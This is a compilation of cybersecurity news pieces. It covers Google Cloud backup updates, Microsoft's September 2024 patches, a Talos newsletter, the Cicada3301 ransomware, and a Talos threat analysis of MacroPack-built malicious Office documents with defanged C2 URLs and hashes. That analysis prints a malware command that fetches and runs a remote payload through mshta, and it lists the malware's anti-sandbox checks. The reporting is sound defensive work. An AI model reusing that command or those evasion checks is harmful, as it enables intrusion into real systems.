The combination of immutability, indelibility, centralized governance, and user empowerment provides a comprehensive backup strategy, Google said.

Source: Aleksei Gorodenkov via Alamy Stock Photo

Google has announced three enhancements to its Google Cloud Backup and Disaster recovery service to enhance customers' ability to manage backups simply and securely, while boosting agility and reducing the workload on IT teams.

Backup and disaster recovery technologies are key components of ransomware defense. The first enhancement allows users to create backup vault storage systems that cannot be modified or accidentally deleted. Backup vault data is stored in Google-managed projects and "logically air-gapped" from Google Cloud projects, the company stated in a blog post. Compute Engine virtual machines (VMs), VMware Engine VMs, Oracle databases, and SQL Server databases are supported.

Backup vault storage isn’t visible to users inside the organization, preventing direct attacks, and Google manages access through its Google Cloud Backup and DR service application programming interfaces (APIs) and user interface (UI). Users can set vault backup rules on modification and deletion when creating vaults. The backups are fully self-contained, giving users the opportunity for recovery when a source resource is no longer available, helping teams keep production applications online.

Google is also making updates to its centralized backup management system. Its new fully managed service is an integrated, developer-centric, self-service model that allows app developers to back up their VMs while the teams managing storage and backup systems retain governance and oversight. Monitoring and reporting capabilities include scheduled backup jobs and restore jobs, customizable reporting, and alerts and notifications. 

The system, integrated with Google Cloud Identity and Access Management (IAM), lets developers create backups during the creation of Compute Engine VMs so that users have correct data protection policies deployed from the outset of project creation. 

Both products are currently available in preview, Google said. The backup vault feature will be generally available in the coming months. During preview, users will be able to access these features through the UI and Google Cloud CLI to protect Compute Engine VMs. Once it is generally available, users will have access to APIs and Terraform.

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Google Updates Cloud Backup, Disaster Recovery Service

Microsoft's September 2024 Patch Tuesday is here. Make sure you’ve applied the necessary patches!

Microsoft September 2024 Patch Tuesday addresses 79 security vulnerabilities, including four actively exploited zero-days. It covers critical flaws in Windows Installer, MoTW, Publisher, and Windows Update.

Microsoft’s September 2024 Patch Tuesday is packed with critical updates, addressing a total of 79 vulnerabilities, including four actively exploited flaws and one publicly disclosed zero-day. Seven of these vulnerabilities were rated as critical, most of which were either remote code execution (RCE) or elevation of privileges (EoP) flaws.

****Highlighting Critical Vulnerabilities********1\. Actively Exploited Vulnerabilities:****

Among the most urgent updates were four vulnerabilities that were being actively exploited by malicious actors. These vulnerabilities represent a major risk to users and organizations that have yet to apply the patches, as they were being used in real-world attacks before the patches were available.

****CVE-2024-38217 – Windows Mark of the Web (MoTW) Security Feature Bypass Vulnerability:****

This critical vulnerability allows attackers to bypass security warnings meant to protect users from opening files from untrusted sources. Attackers can manipulate these security features to deceive users into executing malicious files without triggering the standard MoTW prompts. This vulnerability has previously been linked to ransomware attacks, making it a high-priority fix.

****CVE-2024-43461 – Windows MSHTML Platform Spoofing Vulnerability:****

This vulnerability enables attackers to spoof legitimate web content, which can be leveraged for phishing attacks and unauthorized data theft. This flaw shares similarities with CVE-2024-38112, which was used by advanced persistent threat (APT) groups in zero-day attacks. Given the active exploitation of related vulnerabilities, CVE-2024-43461 has a high likelihood of being used in future attacks.

****2\. Zero-Day Vulnerabilities:********CVE-2024-43491 — Remote Code Execution in Windows Update:****

This critical vulnerability could allow attackers to remotely execute code by exploiting weaknesses in the Windows Update process, gaining control of affected systems.

****CVE-2024-38014 — Elevation of Privilege in Windows Installer:****

This vulnerability allows attackers to gain elevated privileges by exploiting flaws in the Windows Installer, providing them with administrative-level access to compromised systems.

****CVE-2024-38217 — Windows Mark of the Web (MoTW) Bypass Vulnerability:****

Attackers can bypass the security mechanisms of MoTW, which are designed to alert users about harmful files downloaded from the internet, leading to unauthorized code execution.

****CVE-2024-38226 — Microsoft Publisher Security Bypass:****

This flaw allows attackers to exploit the security features in Microsoft Publisher, enabling them to execute malicious code by bypassing standard file protections.

****Critical Vulnerabilities Fixed****

Seven vulnerabilities were marked as critical, primarily involving remote code execution (RCE) or elevation of privilege. These vulnerabilities include:

*   **CVE-2024-43455** – Windows Remote Desktop Protocol (RDP) RCE vulnerability, which could allow attackers to remotely execute code on a compromised system, gaining full control of the machine.
*   **CVE-2024-43456** – Windows Kernel EoP vulnerability, allowing attackers to escalate their privileges on a targeted system, gaining administrative rights.
*   **CVE-2024-43469** – A high-severity remote code execution vulnerability in Azure CycleCloud, allowing attackers to execute arbitrary code with limited privileges. It has a CVSS score of 8.8, making patching critical to prevent exploitation

****Recommendations and Mitigation****

Given the critical nature of many of these vulnerabilities, especially the actively exploited and publicly disclosed flaws, Microsoft strongly recommends that organizations prioritize patch deployment.

**Patch Management:** Enterprises should accelerate their patch management processes to mitigate risks associated with vulnerabilities like CVE-2024-38217 and CVE-2024-43461. These flaws are being actively exploited in the wild, posing substantial risks to unpatched systems.

**User Education:** Beyond technical protection, users must be made aware of the dangers of interacting with untrusted files and websites. This is important in mitigating the MoTW and spoofing vulnerabilities discussed earlier.

The complete list of vulnerabilities, along with guidance on mitigation strategies, can be found here on Microsoft’s official September 2024 Patch Tuesday update.

Saeed Abbasi, Manager of Vulnerability Research at Qualys Threat Research Unit, commented on Microsoft’s September 2024 Patch Tuesday, stressing the importance of applying the updates promptly to mitigate possible risks.

“CVE-2024-38217 vulnerability allows an attacker to manipulate the security warnings that typically inform users about the risks of opening files from unknown or untrusted sources and similar MoTW bypasses have historically been linked to ransomware attacks, where the stakes are high,” Saeed warned.

He further stressed “Given the exploit’s public disclosure and confirmed exploitation, it is a prime vector for cybercriminals to infiltrate corporate networks. Enterprises must prioritize patch management and educate users on the risks of downloading files from untrusted sources to mitigate the exploitation of such vulnerabilities.”  

“The CVE-2024-43461 vulnerability mirrors the patterns of CVE-2024-38112 where the exploitation might be repurposed against CVE-2024-43461 due to the similar attack vectors involved. There exists a high likelihood of exploitation, as this vulnerability enables attackers to spoof legitimate web content, leading to unauthorized actions such as phishing and data theft,” he added.

“This risk is highlighted by past incidents where similar vulnerabilities were actively exploited in the wild, posing substantial security challenges to corporate networks. Given the critical nature of this vulnerability, we recommend fast-tracking patch management processes to mitigate potential impacts,” Saeed advised.

1.  **Mailcow Patches XSS and File Overwrite Flaws – Update NOW**
2.  **Google Patches Flaws in Quick Share After Researchers’ Warning**
3.  **Broadcom: Urgent Patch for Severe VMware vCenter Server Flaws**
4.  **TellYouThePass Ransomware Exploits Critical PHP Flaw, Patch NOW**
5.  **PATCH NOW! Veeam Flaw Puts Thousands of Backup Servers at Risk**

Microsoft September 2024 Patch Tuesday Fixes 79 Flaws, Including 4 Zero-Days

In my opinion, mandatory enrollment is best enrollment.

Thursday, September 5, 2024 14:00

As most quality thoughts go, my most recent musing on security came about because of fantasy football. 

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.  

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials. 

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA. 

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone). 

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day. 

Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.  

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction. 

**The one big thing **

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.  

**Why do I care? **

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malicious files Talos analyzed as part of this research. Our blog post also has an in-depth breakdown of the four major themes used across these malicious documents, information that could be crucial to informing potential targets about these threats.  

**Top security headlines of the week **

**A new report from Google’s Threat Analysis Group found that Russia’s APT29 is exploiting some of the same vulnerabilities as two popular spyware vendors.** The analysis comes from watering hole attacks that researchers saw in the wild between November 2023 and July 2024 targeting Mongolian government websites. APT29, largely thought to be connected to Russia’s government, exploited the same vulnerabilities in Apple iOS WebKit and Google Chrome that two spyware vendors, Intellexa and NSO Group, are also known to use. The actor (also known as Cozy Bear and Midnight Blizzard) compromised the government-controlled websites to embed malicious payloads in hidden iframes on web pages. These iframes pointed users to attacker-controlled websites, where the exploits were deployed to steal user data from iOS and Android devices. Intellexa, which Cisco Talos has reported on several times, was recently blacklisted by the U.S. government for its role in creating and distributing the Predator spyware. And the Israeli NSO Group is infamous for its Pegasus spyware, commonly used to target at-risk individuals like journalists, politicians and activists. (Google TAG, The Record) 

**A North Korean state-sponsored actor known as Citrine Sleet is actively exploiting a zero-day vulnerability in the Google Chrome web browser to steal users’ cryptocurrency.** Microsoft wrote in an advisory regarding the vulnerability, identified as CVE-2024-7971, that users had been "targeted and compromised" by the zero-day attack. Google has since released a patch for the issue. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow an attacker to execute remote code on the targeted machine. Citrine Sleet is believed to be based in North Korea and primarily targets financial institutions, especially those that manage cryptocurrency accounts. Its social engineering techniques focus on the cryptocurrency industry and individuals believed to be associated with it. Exploitation of the vulnerability started by tricking a victim into visiting an attacker-controlled website. Then, because of a different vulnerability in the Windows kernel, Citrine Sleet could install a rootkit on the target’s computer, essentially giving them complete control of the machine. Cryptocurrency has long been a target for North Korean state-sponsored actors, who often use the stolen currency to fund the country’s military operations. (TechCrunch, Decipher) 

**The FBI released a new warning this week that North Korean actors could soon launch a wave of cyber attacks targeting "organizations with access to large quantities of cryptocurrency-related assets or products.”** A public service announcement released Tuesday said that actors had been carrying out reconnaissance-related social engineering campaigns for months targeting individuals believed to be involved in the cryptocurrency industry, or employees of financial institutions who handle virtual currency. Most of the potential targets are found by the actors by monitoring their social media activity, particularly on professional networking or employment-related platforms. These actors also are impersonating legitimate employees, looking to gain remote employment at these companies using fake names, identities and profiles. “Given the scale and persistence of this malicious activity, even those well versed in cybersecurity practices can be vulnerable to North Korea's determination to compromise networks connected to cryptocurrency assets,” the PSA reads. (Dark Reading, FBI) 

**Can’t get enough Talos? **

*   Vulnerabilities in Microsoft apps for macOS allow stealing permissions 
*   BlackByte ransomware group targets VMware ESXi bug 
*   Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks 
*   Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers 

**Upcoming events where you can find Talos **

**LABScon** **(Sept. 18 - 21)**  

_Scottsdale, Arizona_ 

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256**: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201 

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d   
**MD5:** fd743b55d530e0468805de0e83758fe9   
**Typical Filename:** KMSAuto Net.exe   
**Claimed Product:** KMSAuto Net   
**Detection Name:** W32.File.MalParent

The best and worst ways to get users to improve their account security

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.
"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity

Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation.

"It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity company Morphisec said in a technical report shared with The Hacker News.

Written in Rust and capable of targeting both Windows and Linux/ESXi hosts, Cicada3301 first emerged in June 2024, inviting potential affiliates to join their ransomware-as-a-service (RaaS) platform via an advertisement on the RAMP underground forum.

A notable aspect of the ransomware is that the executable embeds the compromised user's credentials, which are then used to run PsExec, a legitimate tool that makes it possible to run programs remotely.

Cicada3301's similarities with BlackCat also extend to its use of ChaCha20 for encryption, fsutil to evaluate symbolic links and encrypt redirected files, as well as IISReset.exe to stop the IIS services and encrypt files that may otherwise be locked for for modification or deletion.

Other overlaps to BlackCat include steps undertaken to delete shadow copies, disable system recovery by manipulating the bcdedit utility, increase the MaxMpxCt value to support higher volumes of traffic (e.g., SMB PsExec requests), and clear all event logs by utilizing the wevtutil utility.

Cicada3301 has also observed stopping locally deployed virtual machines (VMs), a behavior previously adopted by the Megazord ransomware and the Yanluowang ransomware, and terminating various backup and recovery services and a hard-coded list of dozens of processes.

Besides maintaining a built-in list of excluded files and directories during the encryption process, the ransomware targets a total of 35 file extensions - sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

Morphisec said its investigation also uncovered additional tools like EDRSandBlast that weaponize a vulnerable signed driver to bypass EDR detections, a technique also adopted by the BlackByte ransomware group in the past.

The findings follow Truesec's analysis of the ESXi version of Cicada3301, while also uncovering indications that the group may have teamed up with the operators of the Brutus botnet to obtain initial access to enterprise networks.

"Regardless of whether Cicada3301 is a rebrand of ALPHV, they have a ransomware written by the same developer as ALPHV, or they have just copied parts of ALPHV to make their own ransomware, the timeline suggests the demise of BlackCat and the emergence of first the Brutus botnet and then the Cicada3301 ransomware operation may possibly be all connected," the company noted.

The attacks against VMware ESXi systems also entail using intermittent encryption to encrypt files larger than a set threshold (100 MB) and a parameter named "no\_vm\_ss" to encrypt files without shutting down the virtual machines that are running on the host.

The emergence of Cicada3301 has also prompted an eponymous "non-political movement," which has dabbled in "mysterious" cryptographic puzzles, to issue a statement that it has no connection to the ransomware scheme.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.

*   Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
*   MacroPack is a framework designated for Red Team exercises, but we assess, with moderate confidence, that malicious actors are also using it to deploy malicious payloads.
*   Talos analyzed the most recent documents uploaded to VirusTotal from different sources and countries, including China, Pakistan, Russia and the U.S., uncovering connections between the payloads and motivations for creating these documents.
*   These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
*   Talos was not able to attribute these activities to a single actor despite some similarities in tactics, techniques and procedures (TTPs). No Talos customers were affected by these attacks and there are no related activities  in any Cisco product telemetry.

The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable. 

As a part of regular hunting exercises for malicious documents similar to the ones used by UNC1151, we discovered several suspicious documents using VBA macros that were similar but could not be attributed to the same threat actor.

Although the VBA code was similar — using obfuscated variable and function names and one or more layers of obfuscated code in their following stages — the lure themes were different, ranging from generic topics that instruct users to enable VBA macros, to official-looking documents and letters that appear to come from military organizations, pointing to various distinct threat actors. 

**Common characteristics of MacroPack VBA code**

The VBA code in all the documents had similar characteristics, which we traced to the MacroPack framework. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. 

The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures:

*   Function renaming.
*   Variable renaming.
*   Removal of surplus space characters.
*   Removal of comments.
*   Strings encoding.
*   Payload obfuscation.

A payload string deobfuscation function generated by MacroPack.

MacroPack is designed to be easy to use and quickly generate various payloads allowing users to build working implants with a single command line. 

MacroPack also exists in a professional, supported version, which contains additional functionality to make payloads more resilient and has some more advanced features such as anti-malware bypass, more advanced payloads, anti-reversing and additional payloads. The author states that the tool is intended to be used by Red Team members and not for malicious purposes, although there is no control over who uses the free version of the tool. 

**Inclusion of non-malicious code**

A common feature in all the malicious documents we dissected that caught our attention is the existence of four non-malicious VBA subroutines. These subroutines appeared in all the samples and were not obfuscated. They also had never been used by any other malicious subroutines or anywhere else in any documents. 

At the beginning of the investigation, we suspected all the documents containing these unusual non-malicious subroutines were created by a single threat actor. But the different document lures and countries from where the documents were uploaded lead us to conclude that those subroutines were included by the professional version of MacroPack, which we confirmed via reliable, high-fidelity sources. 

Snippet of code taken from a Word programming book.

We traced the origin of the two functions to a website hosting various VBA examples and one to a French Microsoft Word programming book “Rédigez Facilement Des Documents Avec Word” (“Easily Writing Documents with Word”) by Michel Martin.

Non-malicious functions common for all discovered documents from the VBA examples website.

The inclusion of the benign code is likely to lower the level of suspicion of the code generated by MacroPack. Some anti-malware engines may be able to detect code as suspicious if the entropy of the code is high to indicate pseudo-randomly named variables, functions and obfuscated strings and the inclusion of non-malicious functions with low entropy may be used to lower the overall entropy of the generated code. 

Some documents containing the non-malicious code, attributed to MacroPack, also used a different technique for generating code. Instead of completely pseudo-randomly generated variable and function names, they consisted of combinations of randomly chosen real words. 

The MacroPack author indicated that he worked on a feature to generate names using Markov chains to create seemingly meaningful function and variable names. 

MacroPack author announced the random name generator based on valid English words on X (Twitter). 

This functionality was included by the MacroPack author to improve the bypassing of anti-malware heuristic detections. We discovered a few samples using this technique to obfuscate the functionality of the code with meaningful-looking function and variable names.

Function and variable names generated by a Markov chain.

**MacroPack documents uploaded to VirusTotal**

Although the TTPs in the discovered samples seem malicious and the lure themes indicate that they are, we were unable to trace the actors to a particular group, which also leaves a possibility that they were part of red teaming exercises. However, it is still important to document the samples as blue teams may also encounter them in their own detection tests. 

For some discovered samples, we confirmed they were part of some Red Team activities and they are not included in the list of IOCs. A description of a few interesting clusters of documents follows. 

All the documents have a similar flow, being generated by the framework and consist of at least three stages of code before connecting to the C2 server, to allow infected systems to be controlled by the threat actors. 

Stages of execution for discovered MacroPack-generated documents.

**Theme 1: Lures uploaded from China**

The first cluster of three documents were uploaded to VirusTotal from IP addresses residing in China, Taiwan and Pakistan in May and July 2024, and feature three similar lures with a generic Word document content that instructs the users to “enable content,” which would allow a VBA macro code to execute. The beginning of the document contains this text either in Chinese or English. 

__Chinese version of the lure.__

All C2 IP addresses for the payloads of the generic template campaign reside in the address space of the same autonomous system, AS4837, located in the Henan province in China, which, together with the usage of similar lure themes and MacroPack, enable us to cluster them as originating from a single actor. 

__English variant of the lure.__

**Theme 1 payloads**

Two of the three documents, the ones with lures in Chinese, have the Havoc demon (implant) as the final payload. Havoc is a post-exploitation command and control (C2) framework made for penetration testers, Red Teams and Blue Teams. It's free and open-source on GitHub, written and maintained by Paul Ungur. The Havoc Framework is split into two components — the teamserver and the agent. The Teamserver handles connected operators, tasking agents and parsing the callbacks, results of commands, uploaded files and screenshots. The agents or implants are called demons, in Havoc terminology, and are installed by the operator to the systems that should be controlled.The agents allow the operators to remotely control affected systems. 

The difference between the two variants are that they have different IP addresses for C2, and one lure is compiled for 64-bit Windows, while the other is for 32-bit Windows. Both lures are likely related, as they share similar lure themes, have the same AS for C2 addresses and have C2 URLs that appear as if cloud email communication is attempted, together with appropriate referrers set up in HTTP headers.

First Havoc demon communication to C2, with appropriate HTTP headers specified in its configuration buffer.

After the shellcode loads the Havoc demon, the DLL reads its configuration hosts from a plain text structure.

The second payload is a Brute Ratel implant (badger) loaded from a shellcode loader as a DLL.  Brute Ratel is a C2 framework primarily used for Red Teaming and adversary simulation, although it was also abused by real threat actors. 

Brute Ratel is a very popular framework similar to Cobalt Strike and enables its users to:

*   Deploy agents (called badgers) onto target systems.
*   Execute commands remotely.
*   Perform lateral movement within a network.
*   Establish persistence.
*   Evade detection by endpoint security solutions.

The configuration for the badger is stored in the shellcode body (approximately 250KB long) and the DLL decrypts it using RC4 decryption with the decryption key hardcoded in the badger executable. 

Brute Ratel configuration is decrypted by a RC4 decryption routine in the DLL badger.

**Theme 2: Pakistani military lures**

The second cluster of documents, with Pakistani military-related themes, were uploaded to VirusTotal from two different locations in Pakistan. We have elected to classify them together based on the military-related themes and a Brute Ratel DLL badger as the final payload.

Pakistani military-themed document lure uploaded to VirusTotal in January 2024. 

The first document contains an embedded image of a document masquerading as a circular claiming to announce new awards for certain officer ranks in the Pakistan Air Force, with land plots as a reward for their services. When the document is opened and VBA code allowed to run, the MacroPack-generated code will create a Brute Ratel shellcode loader in memory and execute it to load a badger DLL. The configuration for all DLL implants is contained in the shellcode and is used by the badger after decryption using RC4-based decryption. 

The implant in the first document is configured to use DNS over HTTPs with dns\[.\]google and cloudflare-dns\[.\]com servers to tunnel the data over DNS for hosts dns1\[.\]s-logistics\[.\]net and dns2\[.\]s-logistics\[.\]net.

The second lure purports to be a confidential document sent to a specific recipient containing an employment confirmation letter for a civilian member of Pakistan’s Air Force Cyber Team. The payload for this document is also a DLL-based Brute Ratel badger, but this time using several Amazon Cloudfront CDN servers for the C2 rotation. 

Pakistani military-themed document lure uploaded to VirusTotal in February 2024. 

One interesting characteristic of the second document’s Brute Ratel payload is the inclusion of a base64-encoded blob containing a JSON object created to be used with the Adobe Experience Cloud ecosystem for tracking marketing activities. One possible reason for this is that the document was part of a Red Team exercise and Adobe Experience Cloud was used to track the target’s engagement.

Adobe Experience Cloud requests details from the second document.

**Theme 3: Lure uploaded from Russia**

A few things stood out when we observed a file created with MacroPack uploaded to VirusTotal from a Russian IP address at the beginning of July 2024. While most of the other files we analyzed were Word documents, this one is an Excel workbook. The lure also is completely void of content, and when the workbook is opened, there is nothing to see. 

The VBA code was also a bit different from the ones discovered earlier. Instead of creating a byte array containing shellcode and loading it into the host process, this one had more VBA code for the next stage, and the way it was executed was also quite unusual. 

__Partially deobfuscated second stage attempt to download and execute a file from a URL__

_._The first-stage code generates the second VBA layer, launches a new instance of Excel and creates a new workbook that is the target for the injection of the second stage, similar to VBA virus infection. 

When the second stage is executed, it attempts to download, load and execute a file from the URL hxxp\[://\]td\[.\]tula-steel\[.\]ru/en/image\[.\]jpg. We have no indication that this TTP was successful. 

**Theme 3 payload**

At the time of writing this post, the target URL contained a sample of a Golang-based backdoor PhantomCore, which is attributed by researchers from Kaspersky to the Ukrainian hacktivist Head Mare, allegedly targeting government organizations and companies in Russia with the goal of cyber espionage. 

__Before connecting to listen for commands, the C2 host and port are retrieved from PhantomCore data.__

Some PhantomCore variants are obfuscated with the Golang obfuscator, garble, which makes them more challenging for the analyst, but the core functionality is similar — to connect to a C2 server using the rsocket protocol and listen for commands that allows it to install additional modules, upload data or execute a command. 

**Theme 4: Uploaded from the U.S.**

 This final theme was uploaded to VirusTotal much earlier than the previous examples (March 2023) and it purports to be an encrypted NMLS (U.S. Nationwide Multistate Licensing System & Registry) renewal form. We chose this document lure to demonstrate MacroPack’s usage of a Markov Chain-based name generator. This document, similar to the lure uploaded from Russia, has multiple VBA stages. 

The first stage decodes the second and launches another Word instance to run it. Before launching the final payload, the second stage checks for the presence of the analysis environment, such as sandboxes and test systems. 

The second stage code will exit any the following conditions are satisfied:

*   Number of logical CPUs in the system is 1.
*   The User name is “USER”.
*   One of the following processes are active: fiddler, vxstream, vboxservice, tcpview, vmware, procexp, wmtools, processexplorer, processhacker, vbox, autoit, wireshark, procmon, idaq, autoruns, apatedns or windbg.
*   The overall disk size is smaller than 60GB.
*   Total memory size is smaller than 1GB.
*   Word Application recent files count is smaller than three.

__Obfuscated function is checking for presence of analysis environment before downloading the payload.__

The final payload was likely supposed to be an HTML application as the download and launch was attempted by executing the command line “mshta.exe hxxps\[://\]share\[.\]dedesignanddev\[.\]com:443/datadoc”. At the time of writing, Talos has not been able to retrieve and identify the final payload. 

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 63942.

**IOCs **

IOCs for this research can also be found at our GitHub repository here. 

**Theme 1**

0cf1e59bae9dba7fbbf6ee6a36ca6bdb8fa0ac002b8cf824bd0888789a981c57 -64 bit Havoc demon

hxxps\[://\]122\[.\]114\[.\]141\[.\]214/qq\[.\]com/ab735a258a90e8e1f3e3dcf231bf53a9/mail/ - Havoc C2

93df1d60edd6b656b08e0fc0d31b330fd275f5e1a9069dfbb769e7ba217fcb6e - Brute Ratel loader

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/qazxsw -Brute Ratel C2

hxxp\[://\]122\[.\]114\[.\]10\[.\]239/edcvfr

2131de0cb705afa52f88ef70a87ee6c8662d38db0138efc4940218ee62d8a296 - 32 bit Havoc demon

hxxp\[://\]122\[.\]114\[.\]166\[.\]92/Collectors/3\[.\]0/settings/mail/ - Havoc C2

**Theme 2**

cbafcf65b40d95e4699859a523ef4d300c57f93de6fbc6e194d1b922e9f3aba6 - PAF cyber team lure

b5608e73eb460944d9b523a940d94c95d3eb66d6a8efe82462e2589ccfaadb82 - allotment of plots, Pakistan military

dns1\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

dns2\[.\]s-logistics\[.\]net - Brute Ratel C2 - DNS

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php - Brute Ratel C2

hxxps\[://\]d3qrqtfazjdt5i\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net//HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d2wpc9lcvgj680\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Resource/Type/c8d984\[.\]php

hxxps\[://\]d1209brpqetpa4\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

hxxps\[://\]d2v6ycjbdzo6ui\[.\]cloudfront\[.\]net/HubsExtension/Browse/resourceType/id\[.\]php

